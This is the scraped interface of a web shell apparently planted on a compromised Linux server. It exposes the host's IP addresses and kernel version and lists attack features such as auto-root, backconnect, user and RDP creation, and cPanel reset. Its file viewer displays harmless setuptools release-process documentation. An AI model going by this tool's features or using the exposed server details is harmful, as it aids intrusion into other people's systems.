Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.139.234.124
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
python3-setuptools-39.2.0 /
[ HOME SHELL ]
Name
Size
Permission
Action
CHANGES.rst
110.95
KB
-rw-r--r--
README.rst
1.51
KB
-rwxr-xr-x
developer-guide.txt
5.41
KB
-rw-r--r--
development.txt
1.44
KB
-rw-r--r--
easy_install.txt
73.58
KB
-rw-r--r--
formats.txt
30.49
KB
-rw-r--r--
history.txt
1.84
KB
-rw-r--r--
index.txt
537
B
-rw-r--r--
pkg_resources.txt
91.4
KB
-rw-r--r--
python3.txt
3.87
KB
-rw-r--r--
releases.txt
2.4
KB
-rw-r--r--
requirements.txt
61
B
-rw-r--r--
roadmap.txt
167
B
-rw-r--r--
setuptools.txt
125.23
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : releases.txt
=============== Release Process =============== In order to allow for rapid, predictable releases, Setuptools uses a mechanical technique for releases, enacted by Travis following a successful build of a tagged release per `PyPI deployment <https://docs.travis-ci.com/user/deployment/pypi>`_. Prior to cutting a release, please use `towncrier`_ to update ``CHANGES.rst`` to summarize the changes since the last release. To update the changelog: 1. Install towncrier via ``pip install towncrier`` if not already installed. 2. Preview the new ``CHANGES.rst`` entry by running ``towncrier --draft --version {new.version.number}`` (enter the desired version number for the next release). If any changes are needed, make them and generate a new preview until the output is acceptable. Run ``git add`` for any modified files. 3. Run ``towncrier --version {new.version.number}`` to stage the changelog updates in git. Once the changelog edits are staged and ready to commit, cut a release by installing and running ``bump2version {part}`` where ``part`` is major, minor, or patch based on the scope of the changes in the release. Then, push the commits to the master branch:: $ git push origin master $ git push --tags If tests pass, the release will be uploaded to PyPI (from the Python 3.6 tests). .. _towncrier: https://pypi.org/project/towncrier/ Release Frequency ----------------- Some have asked why Setuptools is released so frequently. Because Setuptools uses a mechanical release process, it's very easy to make releases whenever the code is stable (tests are passing). As a result, the philosophy is to release early and often. While some find the frequent releases somewhat surprising, they only empower the user. Although releases are made frequently, users can choose the frequency at which they use those releases. If instead Setuptools contributions were only released in batches, the user would be constrained to only use Setuptools when those official releases were made. With frequent releases, the user can govern exactly how often he wishes to update. Frequent releases also then obviate the need for dev or beta releases in most cases. Because releases are made early and often, bugs are discovered and corrected quickly, in many cases before other users have yet to encounter them. Release Managers ---------------- Additionally, anyone with push access to the master branch has access to cut releases.
Close